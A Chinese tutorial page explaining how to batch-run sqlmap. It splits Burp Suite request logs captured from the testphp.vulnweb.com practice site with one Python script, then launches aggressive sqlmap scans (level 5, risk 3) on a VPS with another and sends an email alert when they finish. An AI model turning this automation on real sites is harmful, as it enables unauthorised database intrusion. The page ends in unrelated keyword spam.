千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 网络安全 >

sqlmap批量跑的方法是什么

发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,本篇内容主要讲解"sqlmap批量跑的方法是什么",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"sqlmap批量跑的方法是什么"吧!使用burpsuite的
千家信息网最后更新 2025年12月02日sqlmap批量跑的方法是什么

本篇内容主要讲解"sqlmap批量跑的方法是什么",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"sqlmap批量跑的方法是什么"吧!

使用burpsuite的日志记录功能,开启这个功能


你不可能使用开启proxy日志,因为你只能有意识去筛选注入的数据包,所以你在proxy那里拦截到数据包之后,发送到repeater,然后run,才可以记录日志。

我们拿这个做测试站,http://testphp.vulnweb.com/

======================================================17:40:30  http://testphp.vulnweb.com:80  [176.28.50.165]======================================================POST /guestbook.php HTTP/1.1Host: testphp.vulnweb.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Referer: http://testphp.vulnweb.com/guestbook.phpContent-Type: application/x-www-form-urlencodedContent-Length: 45Connection: closeUpgrade-Insecure-Requests: 1name=anonymous+user&text=1&submit=add+message============================================================================================================17:41:05  http://testphp.vulnweb.com:80  [176.28.50.165]======================================================GET /comment.php?aid=1 HTTP/1.1Host: testphp.vulnweb.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Referer: http://testphp.vulnweb.com/artists.phpConnection: closeUpgrade-Insecure-Requests: 1============================================================================================================17:41:19  http://testphp.vulnweb.com:80  [176.28.50.165]======================================================POST /comment.php HTTP/1.1Host: testphp.vulnweb.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Referer: http://testphp.vulnweb.com/comment.php?aid=1Content-Type: application/x-www-form-urlencodedContent-Length: 90Connection: closeUpgrade-Insecure-Requests: 1name=%3Cyour+name+here%3E1&comment=1&Submit=Submit&phpaction=echo+%24_POST%5Bcomment%5D%3B======================================================

写了一个脚本去解析分割

f = open('c:\\1.log','r')n = 0t = 1for i in f.readlines():    if i == "======================================================\n":        n = n+1    if n==2:        if i== "======================================================\n":            pass        else:            with open('d:\\'+str(t)+'.txt','a+') as tmp:                tmp.write(i)            #print(i)    if n==3:        n=0        t = t+1    #print(n)

得到了这么多的注入文件

然后将这个导入到VPS,执行下面脚本就可以不用占用自己服务器的资源。跑完之后有邮件提醒,就可以知道结果了

import osimport subprocessimport smtplibfrom email.mime.text import MIMETextfrom email.header import Headerimport  timedef sql():    for root, dirs, files in os.walk("/opt/sql/", topdown=False):        for name in files:            path = os.path.join(root, name)            cmd = 'python /opt/sqlmap/sqlmap.py -r '+ path +' --batch --dbms=mysql -v 3 --level 5 --risk 3 --skip="Host,User-Agent,Accept-Language,Referer,Cookie,"  --threads=10 > /opt/result/'+ name +'  2>&1 &'            print(cmd)            os.system(cmd)def send_email():    # 第三方 SMTP 服务    mail_host = "smtp.163.com"  # 设置服务器    mail_user = "@163.com"  # 用户名    mail_pass = ""  # 口令    sender = '@163.com'    receivers = ['@163.com']  # 接收邮件,可设置为你的QQ邮箱或者其他邮箱    message = MIMEText('完成测试', 'plain', 'utf-8')    message['From'] = Header("test", 'utf-8')    message['To'] = Header("test", 'utf-8')    subject = '完成测试'    message['Subject'] = Header(subject, 'utf-8')    try:        smtpObj = smtplib.SMTP()        smtpObj.connect(mail_host, 25)  # 25 为 SMTP 端口号        smtpObj.login(mail_user, mail_pass)        smtpObj.sendmail(sender, receivers, message.as_string())        print        "邮件发送成功"    except smtplib.SMTPException:        print        "Error: 无法发送邮件"sql()while True:    result = int(os.popen('ps aux | grep sqlmap | wc -l ').read())    print(result)    print(type(result))    if result < 3 :        send_email()        break    else:        time.sleep(10)

到此,相信大家对"sqlmap批量跑的方法是什么"有了更深的了解,不妨来实际操作一番吧!这里是网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!

很赞哦!
方法 邮件 日志 服务 测试 内容 功能 数据 服务器 脚本 邮箱 学习 实用 更深 成功 不用 兴趣 口令 口号 实用性 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 邮件服务器安装和配置 《无线网络安全技术》 北邮网络安全研究生需要几年 天津好的软件开发设计 hive与关系数据库之间的关系 迷你怎么弄服务器账号 我为网络安全代言板报 东北大学网络安全怎么样 lt软件开发工程师 三大运营商软件开发工资 梦幻古龙数据库 点歌机数据库文件损坏 软件开发培训得多久能上手 数据库管理员的发展前景 云服务器批量管理器 人口数据库哪些技术 我身边的网络安全短视频 医院网络安全责任落实情况 服务器断开怎么连接王者 信息网络安全接入网关分类 网络安全技术解析ppt win10服务器管理器设置 腾讯服务器流量超了扣款吗 YOUCAM软件开发 为什么电话号码无法连接服务器 电子商务软件开发方向 企业如何进入当地企业数据库 泰国的服务器租用 通过ip访问自己的服务器项目 网卡导致服务器ping不通

相关文章

0